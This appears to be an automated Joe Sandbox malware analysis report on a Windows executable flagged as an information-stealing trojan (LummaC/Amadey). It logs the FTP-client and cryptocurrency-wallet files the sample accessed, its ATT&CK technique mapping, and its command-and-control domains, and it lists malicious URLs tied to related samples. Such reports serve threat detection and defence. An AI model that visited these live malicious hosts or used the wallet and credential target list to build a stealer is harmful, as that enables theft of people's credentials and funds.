              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the matched-signature count shown in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (11); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
file.exe | 42% | ReversingLabs | Win32.Trojan.Amadey |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | URL Reputation | safe |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe |
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/: | file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/z | file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store:443/apiK | file.exe, 00000000.00000002.3302511591.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/apisco | file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/api1R | file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apid | file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/api;m | file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783683921.000000000557F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2785869789.000000000558B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2787512448.000000000558E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/ | file.exe, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049052120.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289238739.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiY | file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3 | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apihmm | file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289149331.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3279193517.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.mozilla.or | file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api | file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.96.3 | necklacedmny.store | European Union | | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544045
Start date and time: 2024-10-28 18:42:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 5936 because there are no executed function
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe

Time | Type | Description
13:43:05 | API Interceptor | 2970510x Sleep call for process: file.exe modified
Match: 188.114.96.3
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse | filetransfer.io/data-package/jI82Ms6K/download
9D7RwuJrth.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
DBUfLVzZhf.exe | Get hash | malicious | JohnWalkerTexasLoader | Browse | xilloolli.com/api.php?status=1&wallets=0&av=1
R5AREmpD4S.exe | Get hash | malicious | JohnWalkerTexasLoader | Browse | xilloolli.com/api.php?status=1&wallets=0&av=1
7950COPY.exe | Get hash | malicious | FormBook | Browse | www.globaltrend.xyz/b2h2/
transferencia interbancaria_667553466579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | paste.ee/d/Gitmx
19387759999PO-RFQ-INVOICE-doc.exe | Get hash | malicious | FormBook | Browse | www.zonguldakescortg.xyz/483l/
PO 4800040256.exe | Get hash | malicious | FormBook | Browse | www.rtpngk.xyz/876i/
yGktPvplJn.exe | Get hash | malicious | Pushdo | Browse | www.fnsds.org/
rPedidodecompra__PO20441__ARIMComponentes.exe | Get hash | malicious | Lokibot, PureLog Stealer, zgRAT | Browse | dddotx.shop/Mine/PWS/fre.php
Match: necklacedmny.store
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
Match: CLOUDFLARENETUS
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/ | Get hash | malicious | Unknown | Browse | 104.18.11.207
6B530627-1802-4180-83E0-9D13C1074460.1_originalmail.eml | Get hash | malicious | Unknown | Browse | 1.1.1.1
                                                                          https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzu
OVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe | Get hash | malicious | HTMLPhisher | Browse | 104.21.49.204
renier_visser-In Employee -11384.pdf | Get hash | malicious | Unknown | Browse | 104.17.25.14
https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc | Get hash | malicious | Unknown | Browse | 188.114.96.3
z74fBF2ObiS1g87mbS.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
http://shoutout.wix.com | Get hash | malicious | Unknown | Browse | 188.114.96.3
Scan_1626227.pdf | Get hash | malicious | HTMLPhisher | Browse | 104.18.95.41
https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrl | Get hash | malicious | Unknown | Browse | 104.21.79.135
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
XS_Trade_AI-newest_release_.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0 | Get hash | malicious | Abobus Obfuscator | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
Okfjk1hs4kdhs2.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
No context
No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.566920978410129
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'972'160 bytes
MD5: e9d35001e68e949a301d6d0073be4661
SHA1: a378145e6a306b2e7c4f87508906263ab9863a76
SHA256: d500d4168637de6e15d03181eff6abdb01c45cea42bfe20562ac9496bafb3308
